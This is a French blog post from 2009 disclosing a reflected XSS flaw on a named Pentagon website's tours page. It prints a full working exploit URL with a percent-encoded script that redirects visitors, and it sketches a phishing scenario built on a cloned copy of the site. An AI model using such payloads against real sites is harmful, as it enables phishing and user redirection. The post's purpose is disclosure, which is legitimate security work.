Le pentagone, tout le monde connait ce bâtiment mythique abritant le quartier général du département de la Défense des États-Unis. Symbolique de la puissance américaine, le pentagone laisse pourtant quelques portes ouvertes sur son site internet.
Une vulnérabilité XSS toute bête, présente dans la page /tours.
Injections d'iframes également possibles :
Cette vulnérabilité peut sembler anodine, mais elle peut s'avérer désastreuse lors du campagne de phishing.
Imaginez qu'un citoyen américain reçoivent un mail demandant de cliquer sur http://pentagon.afis.osd.mil/. Pas trop bête, il regarde vers quoi redirige ce lien : http://pentagon.afis.osd.mil/tours?action=viewLargePhoto&title=1>"%0A%22%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%6E%65%77%73%2D%6F%66%2D%73%65%63%75%72%69%74%79%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%22%29%3B%3C%2F%73%63%72%69%70%74%3E
C'est bien le site officiel du pentagone, je clique ... et je suis dirigé quasi instantanément vers un autre site. Ici cela redirige vers news-of-security, donc cela se voit. Mais imaginez un phisher qui aurait copié pixel pour pixel le vrai site du pentagone ....
Le site du Pentagone vulnérable aux XSS!
dimanche 6 décembre 2009
Catégories : Hacking, Phishing, Vulnérabilité, XSS
Inscription à :
Publier les commentaires (Atom)
0 commentaires:
Enregistrer un commentaire